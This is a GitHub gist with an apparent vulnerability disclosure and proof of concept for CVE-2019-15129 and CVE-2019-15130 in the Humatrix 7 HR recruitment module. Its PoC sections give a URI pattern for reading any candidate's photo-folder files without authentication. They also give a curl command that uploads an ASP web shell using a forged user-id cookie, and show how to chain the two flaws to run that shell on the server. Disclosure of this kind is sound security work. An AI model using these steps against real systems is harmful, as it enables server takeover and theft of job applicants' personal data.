Skip to content

Instantly share code, notes, and snippets.

@izadgot
Created August 18, 2019 08:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save izadgot/38a7dd553f8024ed3154134dae0414fd to your computer and use it in GitHub Desktop.
Save izadgot/38a7dd553f8024ed3154134dae0414fd to your computer and use it in GitHub Desktop.
PoC Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module - Arbitrary File Upload (CVE-2019-15130) and Unauthorized Access File (CVE-2019-15129)
[Product Description]
Humatrix offers you the most comprehensive Human Resource management solution to cover all of your HR needs in a single integrated, easy to configure & use system that is accessible 24×7 through the web and mobile.
The modular nature of Humatrix solution allows you to personalize and roll out only the modules you need, when you need it,
helping you to reduce complexity, improve usability and productivity. (Information from Humanica homepage)
1. CVE-2019-15129
[Details]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to access all candidates' files
in the photo folder on the website by specifying a "user id" parameter and
file name, such as in a https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/[user id]/photo/[file name] URI.
[Impact]
Unauthorized access file on the application.
[Affected component]
Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module
[Attack Type]
Remote
[PoC]
Browse URI https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/[user id]/photo/[file name] (user id is just a incremetal number).
2. CVE-2019-15130
[Details]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681 allows an unauthenticated attacker to upload any file type to
a candidate's profile picture folder via a crafted multiple-part POST request with a predictable WRC01_USERID parameter to https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_personaltab.cfm
Moreover, the attacker can upload executable content (e.g., asp or aspx) for executing OS commands on the server.
[Impact]
Arbitrary file upload on the application.
[Affected component]
Humanica Humatrix 7 version 1.0.0.203, 1.0.0.681 Recruitment module
[Attack Type]
Remote
[PoC]
1. Use curl and add WRC01_USERID parameter to cookie header (WRC01_USERID value is user id, but in this case, it can be any number e.g., 99999) for uploading executable content (e.g., asp or aspx) to server.
$ curl -v --cookie "WRC01_USERID=99999" -F "photo=@/path/to/webshell.asp" -F "sUploadPhoto=Upload Photo" https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_personaltab.cfm
2. Combine with Unauthorized Access File (CVE-2019-15129) vulnerability for access uploaded file and execute web shell (In this example user id is 99999 and file name is webshell.asp) by browse URI below.
https://[target]/sunfish5/ehrm/humanica/recruitment_online/upload/user/99999/photo/webshell.asp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment